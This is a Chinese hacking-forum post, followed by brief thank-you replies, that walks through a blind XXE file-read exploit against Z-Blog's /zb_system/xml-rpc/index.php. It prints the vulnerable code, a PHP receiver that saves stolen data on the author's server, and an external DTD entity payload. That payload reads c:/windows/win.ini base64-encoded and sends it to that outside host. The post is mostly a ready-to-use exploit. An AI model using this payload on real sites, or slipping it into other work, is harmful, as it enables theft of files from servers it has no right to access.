查看: 87325|回复: 168

Z-BLOG Blind-XXE造成任意文件读取

[复制链接]
发表于 2015-6-9 14:18:58 | 显示全部楼层 |阅读模式
下载最新版Z-Blog:http://bbs.zblogcn.com/thread-88670-1-1.html
/zb_system/xml-rpc/index.php 641行:
[PHP] 纯文本查看 复制代码
$zbp->Load();

Add_Filter_Plugin('Filter_Plugin_Zbp_ShowError','RespondError');

$xmlstring = file_get_contents( 'php://input' );

//Logs($xmlstring);

$xml = simplexml_load_string($xmlstring);

可见,这里直接调用simple_load_string解析XML,造成了一个XML实体注入。
但观察后面的代码发现,需要用户、密码才能执行一些操作,得到回显,否则会报错。
没有回显的情况下,我们怎么来利用XXE,这里就说到一个blind xxe,在这篇文章都有详细的说明:
http://hivesec.net/web-security/%E5%85%B3%E4%BA%8Eblind-xxe.html
所以原理什么的我就不细说了,实际上我也是一知半解。主要看利用方法。
先在我主机上放一个接收文件的php(http://mhz.pw/xxe/get.php):
[PHP] 纯文本查看 复制代码
<?php

file_put_contents('01.txt', $_GET['xxe_local']);

?>

目的是将$_GET[‘xxe_local’]存入本地文件01.txt。然后再构造一个xml,也保存在我的主机上,这个XML实际上就是真正读取文件的XML:
[PHP] 纯文本查看 复制代码
<!ENTITY % payload	SYSTEM	 "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">

<!ENTITY % int "<!ENTITY &#37; trick SYSTEM 'http://mhz.pw/xxe/get.php?xxe_local=%payload;'>">

%int;

%trick;


我们看到这个XML,他引用了外部实体c:/windows/win.ini作为payload的值,然后又将payload拼接到http://mhz.pw/xxe/get.php?xxe_local=%payload;,进行HTTP请求。
接收到请求的get.php就将这个文件内容保存到01.txt了,形成了一个文件读取的过程。
然后,我们向/zb_system/xml-rpc/index.php发包,让它来加载上面这个XML:
QQ截图20150609141628.jpg
发包过去后,就会请求我们的evil_php.xml,解析这个xml造成XXE攻击,读取c:/windows/win.ini并进行base64编码后传给get.php,最后保存在我们的主机上:
QQ截图20150609141704.jpg
用Blind XXE造成一个任意文件读取漏洞。
回复

使用道具 举报

发表于 2015-6-26 20:57:12 | 显示全部楼层
支持中国红客联盟(ihonker.org)
回复 支持 反对

使用道具 举报

发表于 2015-6-26 21:10:24 | 显示全部楼层
回复 支持 反对

使用道具 举报

发表于 2015-6-26 23:04:20 | 显示全部楼层
感谢楼主的分享~
回复 支持 反对

使用道具 举报

发表于 2015-6-27 00:25:59 | 显示全部楼层
回复 支持 反对

使用道具 举报

发表于 2015-6-27 08:17:45 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

发表于 2015-6-27 10:07:22 | 显示全部楼层
感谢楼主的分享~
回复 支持 反对

使用道具 举报

发表于 2015-6-27 17:27:13 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

发表于 2015-6-27 22:48:21 | 显示全部楼层
还是不错的哦,顶了
回复 支持 反对

使用道具 举报

发表于 2015-6-30 01:30:33 | 显示全部楼层
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 15:48 , Processed in 0.024708 second(s), 10 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部